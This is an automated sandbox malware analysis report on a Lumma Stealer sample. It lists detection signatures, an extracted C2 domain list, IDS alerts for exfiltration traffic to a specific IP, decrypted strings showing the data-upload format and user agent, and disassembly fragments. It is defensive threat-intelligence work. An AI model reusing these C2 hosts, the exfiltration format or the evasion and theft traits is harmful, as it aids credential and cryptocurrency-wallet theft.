Edit tour

Windows Analysis Report
X-mas_2.3.2.exe

Overview

General Information

Sample name:	X-mas_2.3.2.exe
Analysis ID:	1582554
MD5:	3dfd44f9df3a6c7b1d20a12a20ba0c67
SHA1:	a0fb2858b35965912b61b82cb575590bb5a401c7
SHA256:	a1378c290f4fa41011aed872439a21dba2604a9b1e48a53bcc518d4d101d4da8
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

X-mas_2.3.2.exe (PID: 3140 cmdline: "C:\Users\user\Desktop\X-mas_2.3.2.exe" MD5: 3DFD44F9DF3A6C7B1D20A12A20BA0C67)

WerFault.exe (PID: 5516 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 1900 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["framekgirus.shop", "noisycuttej.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "abruptyopsn.shop", "nearycrepso.shop", "cloudewahsj.shop", "begguinnerz.biz"], "Build id": "HpOoIh--aadb880da83d"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2578549030.00000000020E0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2578282722.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2578235069.0000000000510000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000003.2343827885.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2332836527.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2317946909.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2319028113.00000000005D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: X-mas_2.3.2.exe PID: 3140	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: X-mas_2.3.2.exe PID: 3140	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: X-mas_2.3.2.exe PID: 3140	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 6 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:19:57.118831+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	172.67.190.223	443	TCP
2024-12-30T21:20:21.266715+0100	2028371	3	Unknown Traffic	192.168.2.5	49741	172.67.190.223	443	TCP
2024-12-30T21:20:22.469399+0100	2028371	3	Unknown Traffic	192.168.2.5	49752	172.67.190.223	443	TCP
2024-12-30T21:20:23.596082+0100	2028371	3	Unknown Traffic	192.168.2.5	49758	172.67.190.223	443	TCP
2024-12-30T21:20:24.806373+0100	2028371	3	Unknown Traffic	192.168.2.5	49768	172.67.190.223	443	TCP
2024-12-30T21:20:26.381234+0100	2028371	3	Unknown Traffic	192.168.2.5	49779	172.67.190.223	443	TCP
2024-12-30T21:20:27.757863+0100	2028371	3	Unknown Traffic	192.168.2.5	54613	172.67.190.223	443	TCP
2024-12-30T21:20:28.593893+0100	2028371	3	Unknown Traffic	192.168.2.5	54620	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:20:20.507183+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	172.67.190.223	443	TCP
2024-12-30T21:20:21.721903+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49741	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:20:20.507183+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	172.67.190.223	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:20:21.721903+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49741	172.67.190.223	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T21:20:28.292238+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	54613	172.67.190.223	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: X-mas_2.3.2.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://begguinnerz.biz/6	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/1	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/q	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apiFK	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/d	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api1	Avira URL Cloud: Label: malware
Source: begguinnerz.biz	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/apiND	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api8	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz:443/api	Avira URL Cloud: Label: malware
Source: https://begguinnerz.biz/api	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.X-mas_2.3.2.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["framekgirus.shop", "noisycuttej.shop", "wholersorie.shop", "tirepublicerj.shop", "rabidcowse.shop", "abruptyopsn.shop", "nearycrepso.shop", "cloudewahsj.shop", "begguinnerz.biz"], "Build id": "HpOoIh--aadb880da83d"}

Multi AV Scanner detection for submitted file

Source: X-mas_2.3.2.exe

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Machine Learning detection for sample

Source: X-mas_2.3.2.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: cloudewahsj.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: rabidcowse.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: noisycuttej.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: tirepublicerj.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: framekgirus.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: wholersorie.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: abruptyopsn.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: nearycrepso.shop
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: begguinnerz.biz
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2578072203.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String decryptor: HpOoIh--aadb880da83d

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Code function: 0_2_00419362 CryptUnprotectData,

0_2_00419362

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

Unpacked PE file: 0.2.X-mas_2.3.2.exe.400000.0.unpack

Source: X-mas_2.3.2.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.190.223:443 -> 192.168.2.5:54613 version: TLS 1.2

Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]	0_2_00426000
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx-143BF0FEh]	0_2_0040C22D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov dword ptr [esp], ecx	0_2_00419362
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h	0_2_0043FB80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+2397B827h]	0_2_0043DCE9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0043DCE9
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 56ADC53Ah	0_2_00440480
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov esi, edx	0_2_00408640
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042BE8A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0042BE8A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_0042A050
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]	0_2_0043E051
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax-01h]	0_2_0043E850
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_0043D818
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h	0_2_00419820
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_00419820
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F830
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F0CB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0042C0CD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_00415882
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	0_2_00415882
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h	0_2_004398A0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	0_2_004390A0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0042C140
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [eax+ebx*8], 9EB5184Bh	0_2_00416148
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+68h]	0_2_00416148
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00416148
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00416148
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], cx	0_2_0042895A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ecx, eax	0_2_0042895A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, word ptr [eax]	0_2_00424974
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00424974
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00428100
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_00440130
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_004229CD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_004229CD
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0043E19A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0042C1A3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27C0856Fh]	0_2_0043C1B0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F1B0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00427A5A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_0041CA60
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], ax	0_2_0041CA60
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-19559D57h]	0_2_0043E262
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+000011E4h]	0_2_00423A60
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042C26C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0042C26C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0042BA79
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F2F6
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0042C282
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0042C282
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-22E2F54Ah]	0_2_0043EA80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00429A90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00426340
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]	0_2_00426340
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	0_2_00402B60
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000092h]	0_2_00426360
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00426360
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00427B08
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F330
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+20h]	0_2_004073C0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]	0_2_004073C0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F3C0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx-5Fh]	0_2_0041C3CC
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then push esi	0_2_00420BD3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then test eax, eax	0_2_004393D0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [eax], dl	0_2_0042238D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_0042238D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov edx, eax	0_2_0043C440
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [ebp+10h]	0_2_0043F450
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]	0_2_00439C70
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00435410
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	0_2_00421C80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	0_2_00416C90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp byte ptr [esi+eax], 00000000h	0_2_004274A5
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+ecx-000000DCh]	0_2_00427CB0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00427CB0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov esi, ecx	0_2_0043C510
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then test eax, eax	0_2_0043C510
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 06702B10h	0_2_0043C510
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	0_2_00414DC0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+5BA4F399h]	0_2_00416C90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+18h]	0_2_004155DB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov ecx, eax	0_2_0041AD80
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h	0_2_0043FE20
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_0041CECA
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx]	0_2_0043E6E0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+000000C8h]	0_2_0040C6F0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00408EF0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_0041DE90
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [ebx], cx	0_2_00418740
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [edi], dx	0_2_00414777
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_0041BFCA
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+20h]	0_2_004237D0
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+5F376B7Fh]	0_2_00417FE1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax+000002E8h]	0_2_00417FE1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00416F8D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov edx, ecx	0_2_00416F8D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [esi], cx	0_2_00416F8D
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov eax, dword ptr [esp+20h]	0_2_00424F91
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_00424F91
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_0043DFB3
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax]	0_2_0211E21A
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+217F4C11h]	0_2_02106267
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then jmp ecx	0_2_02103268
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_020F72AB
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+129161F8h]	0_2_0211E2B8
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov edx, ecx	0_2_020F7340
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4B1BF3DAh	0_2_02119348
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], E81D91D4h	0_2_02120397
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02108387
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	0_2_020F501F
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+5024FCA5h]	0_2_020F5027
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h	0_2_02120087
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0210C0F1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-1EBCBB22h]	0_2_0210C0F1
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	0_2_020FE0F7
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov word ptr [ecx], bp	0_2_020FD13C
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_020E9157
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edi-4Bh]	0_2_0211A171
Source: C:\Users\user\Desktop\X-mas_2.3.2.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+217F4C99h]	0_2_021071D6
